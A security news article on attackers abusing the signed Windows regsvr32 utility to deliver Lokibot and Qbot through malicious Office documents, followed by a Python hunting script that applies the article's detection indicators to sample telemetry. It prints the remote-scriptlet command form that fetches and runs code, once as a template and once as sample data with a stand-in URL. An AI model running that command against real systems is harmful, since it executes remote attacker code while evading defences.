Microsoft's Regsvr32 is Actively Being Used For Silent Cyberattacks

Uptycs researchers have spotted a campaign in which attackers make heavy use of LoLBins to evade detection. More specifically, the Windows regsvr32 utility.

Regsvr32 is a legitimate Microsoft command-line utility that registers and unregisters OLE controls, such as DLLs and ActiveX (.OCX) files, in the Windows Registry. Because it is a signed, trusted Windows binary, its execution is rarely scrutinised by security tools, which is exactly what attracts attackers to it. It is reported to be used for dropping the Lokibot and Qbot trojans, which are delivered through malicious documents.

Leveraging LoLBins For Spreading Trojans

As attackers come up with novel techniques to compromise a target, security vendors keep improving their tools to detect new vectors. But those tools often struggle to tell legitimate use of built-in system utilities from malicious use, and abusing such utilities is a technique that is growing in popularity.

Attackers in the wild are leveraging LoLBins in their operations, as spotted by the Uptycs team. Living-off-the-land binaries (LoLBins) are legitimate executables, usually signed by the vendor and shipped with the operating system, that are used for routine tasks during normal system operation. Because they are already present on every machine and trusted by default, an attacker can use them to run code, fetch payloads or bypass application controls without dropping a new tool of their own.

Microsoft’s regsvr32.exe is one such LoLBin, used by many applications on Windows to register the components they need. And since it is a signed Microsoft binary, its execution isn’t considered malicious in most cases by most security systems. It is this trust that led attackers to use regsvr32 in their operations.

Timeline of the samples leveraging regsvr32

Starting with a malicious document sent through email, the attackers use regsvr32.exe to register .OCX files that carry trojans like Lokibot and Qbot. Researchers said they have spotted “more than 500+ malware samples using Regsvr32.exe to register .OCX files.”

The initial malicious documents arrive as Microsoft Excel, Microsoft Word, Rich Text Format or Composite Document (OLE) files. Advising everyone to be vigilant, the researchers shared the following indicators for spotting an infection:

  • Look for parent/child process relationships where regsvr32.exe is executed with Microsoft Word or Microsoft Excel as its parent process;
  • Look for regsvr32.exe executions that load scrobj.dll, which executes a COM scriptlet. The well-known form of this is a command line of the shape regsvr32 /s /n /u /i:<URL to .sct file> scrobj.dll, which runs a remote scriptlet without writing it to disk.
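The two indicators above translate directly into detection logic over endpoint telemetry. The following is an added example written for this page, not code from Uptycs or from the original article: it runs both checks (plus an extra, assumed heuristic for .OCX files registered from user-writable directories) over constructed Sysmon-style events. Event IDs 1 (process create) and 7 (image load), the field names and all sample paths are assumptions made for the example.

```python
"""Hunt for regsvr32 abuse patterns in process-create / image-load events.

Added example; the event records below are constructed for illustration and
loosely follow Sysmon's Event ID 1 (process create) and 7 (image load).
"""
import re
from dataclasses import dataclass

# Office parents named in the article; extend with others as needed.
OFFICE_PARENTS = {"winword.exe", "excel.exe"}

# Assumed heuristic: directories a malicious document can write to, where a
# dropped .ocx would typically land before being registered.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

# /i:<URL> together with scrobj.dll is the remote COM scriptlet ("Squiblydoo") form.
REMOTE_SCRIPTLET_RE = re.compile(r"/i:\s*https?://", re.IGNORECASE)
# Pull the .ocx path out of a command line, quoted or not.
OCX_RE = re.compile(r'"([^"]+\.ocx)"|(\S+\.ocx)', re.IGNORECASE)


@dataclass
class Event:
    event_id: int           # 1 = process create, 7 = image load (Sysmon numbering, assumed)
    pid: int
    image: str              # full path of the process image
    parent_image: str = ""  # process-create events only
    command_line: str = ""  # process-create events only
    image_loaded: str = ""  # image-load events only


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return a list of (pid, reason) findings for regsvr32.exe activity."""
    findings = []
    for ev in events:
        if basename(ev.image) != "regsvr32.exe":
            continue
        if ev.event_id == 1:
            parent = basename(ev.parent_image)
            if parent in OFFICE_PARENTS:
                findings.append((ev.pid, f"regsvr32 spawned by {parent}"))
            cl = ev.command_line.lower()
            if "scrobj.dll" in cl and REMOTE_SCRIPTLET_RE.search(cl):
                findings.append((ev.pid, "regsvr32 /i:<URL> scrobj.dll (remote scriptlet)"))
            m = OCX_RE.search(cl)
            if m:
                ocx = m.group(1) or m.group(2)
                if any(d in ocx for d in USER_WRITABLE):
                    findings.append((ev.pid, f".ocx registered from user-writable path {ocx}"))
        elif ev.event_id == 7 and basename(ev.image_loaded) == "scrobj.dll":
            findings.append((ev.pid, "regsvr32 loaded scrobj.dll"))
    return findings


def suspicious_pids(events):
    """Distinct PIDs with at least one finding, sorted."""
    return sorted({pid for pid, _ in analyze(events)})


# Constructed sample telemetry: one benign install, one Office-spawned
# registration, one remote-scriptlet run, and an unrelated scrobj.dll load.
SAMPLE_EVENTS = [
    Event(1, 1001, r"C:\Windows\System32\regsvr32.exe",
          parent_image=r"C:\Program Files\Vendor\setup.exe",
          command_line=r'regsvr32.exe /s "C:\Program Files\Vendor\control.ocx"'),
    Event(1, 2002, r"C:\Windows\SysWOW64\regsvr32.exe",
          parent_image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          command_line=r"regsvr32.exe -s C:\Users\alice\AppData\Local\Temp\acdf.ocx"),
    Event(1, 3003, r"C:\Windows\System32\regsvr32.exe",
          parent_image=r"C:\Windows\System32\cmd.exe",
          command_line=r"regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"),
    Event(7, 3003, r"C:\Windows\System32\regsvr32.exe",
          image_loaded=r"C:\Windows\System32\scrobj.dll"),
    Event(7, 4004, r"C:\Windows\System32\wscript.exe",
          image_loaded=r"C:\Windows\System32\scrobj.dll"),
]

if __name__ == "__main__":
    for pid, reason in analyze(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The benign installer (pid 1001) registering a control from Program Files produces no finding, while the Word-spawned registration of an .OCX in a Temp folder and the remote-scriptlet invocation are each flagged on more than one indicator, which is the kind of corroboration an analyst would want before escalating.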
